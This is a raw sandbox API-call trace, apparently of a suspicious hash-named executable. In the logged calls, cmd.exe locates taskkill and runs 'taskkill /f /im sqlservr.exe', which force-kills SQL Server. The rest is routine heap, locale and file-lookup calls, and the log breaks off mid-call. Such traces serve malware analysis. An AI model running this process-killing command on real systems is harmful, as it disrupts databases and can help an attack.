FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x490618 [0149.687] FindClose (in: hFindFile=0x490618 | out: hFindFile=0x490618) returned 1 [0149.687] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0149.687] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x490618 [0149.687] FindClose (in: hFindFile=0x490618 | out: hFindFile=0x490618) returned 1 [0149.687] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0149.688] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0149.688] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0149.688] GetProcessHeap () returned 0x490000 [0149.688] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49a790) returned 1 [0149.688] GetEnvironmentStringsW () returned 0x497cc0* [0149.688] GetProcessHeap () returned 0x490000 [0149.688] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa76) returned 0x499d50 [0149.688] FreeEnvironmentStringsA (penv="=") returned 1 [0149.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0149.689] GetProcessHeap () returned 0x490000 [0149.689] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4905c8) returned 1 [0149.689] GetProcessHeap () returned 0x490000 [0149.689] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400e) returned 0x49bc50 [0149.690] GetProcessHeap () returned 0x490000 [0149.690] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4c) returned 0x49a7d0 [0149.690] GetProcessHeap () returned 0x490000 [0149.690] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x49fc68 [0149.693] GetProcessHeap () returned 0x490000 [0149.694] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4a3c78 [0149.695] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0149.696] GetProcessHeap () returned 0x490000 [0149.696] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x49a828 [0149.696] SetErrorMode (uMode=0x0) returned 0x8003 [0149.696] SetErrorMode (uMode=0x1) returned 0x0 [0149.696] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x49a830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0149.696] SetErrorMode (uMode=0x8003) returned 0x1 [0149.696] GetProcessHeap () returned 0x490000 [0149.696] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a828, Size=0x7e) returned 0x49a828 [0149.697] GetProcessHeap () returned 0x490000 [0149.697] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a828) returned 0x7e [0149.697] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0149.697] GetProcessHeap () returned 0x490000 [0149.697] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x62) returned 0x49a8b0 [0149.697] GetProcessHeap () returned 0x490000 [0149.697] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb8) returned 0x49a920 [0149.697] GetProcessHeap () returned 0x490000 [0149.697] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a920, Size=0x62) returned 0x49a920 [0149.697] GetProcessHeap () returned 0x490000 [0149.697] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a920) returned 0x62 [0149.697] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0149.697] GetProcessHeap () returned 0x490000 [0149.697] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe0) returned 0x49a990 [0149.703] GetProcessHeap () returned 0x490000 [0149.703] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a990, Size=0x76) returned 0x49a990 [0149.703] GetProcessHeap () returned 0x490000 [0149.703] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a990) returned 0x76 [0149.703] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0149.703] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im sqlservr.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0149.704] GetLastError () returned 0x3 [0149.704] GetProcessHeap () returned 0x490000 [0149.704] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49fc68) returned 1 [0149.704] GetProcessHeap () returned 0x490000 [0149.705] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4a3c78) returned 1 [0149.705] GetProcessHeap () returned 0x490000 [0149.705] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49bc50) returned 1 [0149.705] GetConsoleOutputCP () returned 0x1b5 [0149.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0149.718] GetUserDefaultLCID () returned 0x409 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0149.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0149.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0149.721] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0149.721] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0149.721] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0149.724] GetProcessHeap () returned 0x490000 [0149.724] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20c) returned 0x49aa58 [0149.724] GetConsoleTitleW (in: lpConsoleTitle=0x49aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0149.731] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0149.732] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0149.732] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0149.732] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0149.732] GetProcessHeap () returned 0x490000 [0149.732] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x49bc50 [0149.732] GetProcessHeap () returned 0x490000 [0149.733] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49bc50) returned 1 [0149.734] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0149.734] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0149.734] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0149.734] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0149.734] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0149.734] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0149.734] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0149.734] GetProcessHeap () returned 0x490000 [0149.734] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x49ac70 [0149.734] GetProcessHeap () returned 0x490000 [0149.734] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x1a) returned 0x490578 [0149.735] GetProcessHeap () returned 0x490000 [0149.735] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x34) returned 0x49acd0 [0149.736] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0149.740] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0149.740] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0149.740] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0149.740] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0149.740] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0149.740] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0149.740] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0149.740] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0149.740] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0149.741] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0149.741] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0149.741] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0149.741] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0149.741] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0149.741] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0149.741] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0149.741] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0149.741] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0149.741] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0149.741] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0149.741] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0149.741] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0149.741] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0149.741] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0149.741] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0149.741] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0149.741] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0149.741] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0149.741] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0149.741] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0149.741] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0149.741] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0149.741] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0149.741] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0149.741] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0149.742] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0149.742] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0149.742] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0149.742] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0149.742] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0149.742] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0149.742] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0149.742] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0149.742] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0149.742] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0149.742] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0149.742] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0149.742] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0149.742] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0149.742] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0149.742] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0149.742] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0149.742] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0149.742] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0149.742] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0149.742] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0149.742] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0149.743] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0149.743] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0149.743] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0149.743] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0149.743] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0149.743] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0149.743] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0149.743] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0149.743] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0149.743] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0149.743] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0149.743] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0149.743] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0149.743] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0149.743] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0149.743] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0149.743] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0149.743] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0149.743] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0149.743] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0149.743] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0149.743] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0149.743] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0149.743] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0149.743] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0149.744] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0149.744] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0149.744] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0149.744] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0149.744] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0149.744] GetProcessHeap () returned 0x490000 [0149.744] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x49ad10 [0149.744] GetProcessHeap () returned 0x490000 [0149.744] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x46) returned 0x49af28 [0149.744] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0149.745] GetProcessHeap () returned 0x490000 [0149.745] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x4905c8 [0149.745] SetErrorMode (uMode=0x0) returned 0x8003 [0149.745] SetErrorMode (uMode=0x1) returned 0x0 [0149.745] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4905d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0149.745] SetErrorMode (uMode=0x8003) returned 0x1 [0149.745] GetProcessHeap () returned 0x490000 [0149.745] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4905c8, Size=0x56) returned 0x4905c8 [0149.745] GetProcessHeap () returned 0x490000 [0149.745] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4905c8) returned 0x56 [0149.745] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0149.745] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.746] GetProcessHeap () returned 0x490000 [0149.746] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x110) returned 0x49af78 [0149.746] GetProcessHeap () returned 0x490000 [0149.746] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x218) returned 0x490628 [0149.752] GetProcessHeap () returned 0x490000 [0149.752] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x490628, Size=0x112) returned 0x490628 [0149.752] GetProcessHeap () returned 0x490000 [0149.752] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x490628) returned 0x112 [0149.752] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0149.752] GetProcessHeap () returned 0x490000 [0149.752] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe0) returned 0x49b090 [0149.755] GetProcessHeap () returned 0x490000 [0149.755] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49b090, Size=0x76) returned 0x49b090 [0149.755] GetProcessHeap () returned 0x490000 [0149.755] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49b090) returned 0x76 [0149.755] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0149.755] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0149.756] GetLastError () returned 0x2 [0149.756] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0149.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x49b110 [0149.757] GetProcessHeap () returned 0x490000 [0149.757] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x497608 [0149.757] FindClose (in: hFindFile=0x49b110 | out: hFindFile=0x49b110) returned 1 [0149.757] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0149.758] GetLastError () returned 0x2 [0149.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x49b110 [0149.758] GetProcessHeap () returned 0x490000 [0149.758] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x497608, Size=0x4) returned 0x49b150 [0149.758] FindClose (in: hFindFile=0x49b110 | out: hFindFile=0x49b110) returned 1 [0149.758] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.758] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.758] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0149.762] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0149.762] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0149.762] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144)) [0149.762] GetProcessHeap () returned 0x490000 [0149.762] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x18) returned 0x497468 [0149.763] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0149.763] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0149.763] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0149.763] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0149.763] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0149.763] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0149.763] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0149.763] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0149.764] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0149.765] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0149.765] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0149.765] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0149.765] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0149.765] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0149.765] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0149.765] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0149.765] GetProcessHeap () returned 0x490000 [0149.765] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x497468) returned 1 [0149.765] GetProcessHeap () returned 0x490000 [0149.765] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa) returned 0x49b110 [0149.765] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.771] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im sqlservr.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im sqlservr.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im sqlservr.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xd9c, dwThreadId=0xe4c)) returned 1 [0149.793] CloseHandle (hObject=0x98) returned 1 [0149.793] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.793] GetProcessHeap () returned 0x490000 [0149.794] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x499d50) returned 1 [0149.794] GetEnvironmentStringsW () returned 0x499d50* [0149.794] GetProcessHeap () returned 0x490000 [0149.794] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa76) returned 0x497cc0 [0149.794] FreeEnvironmentStringsA (penv="=") returned 1 [0149.794] WaitForSingleObject (hHandle=0x9c, 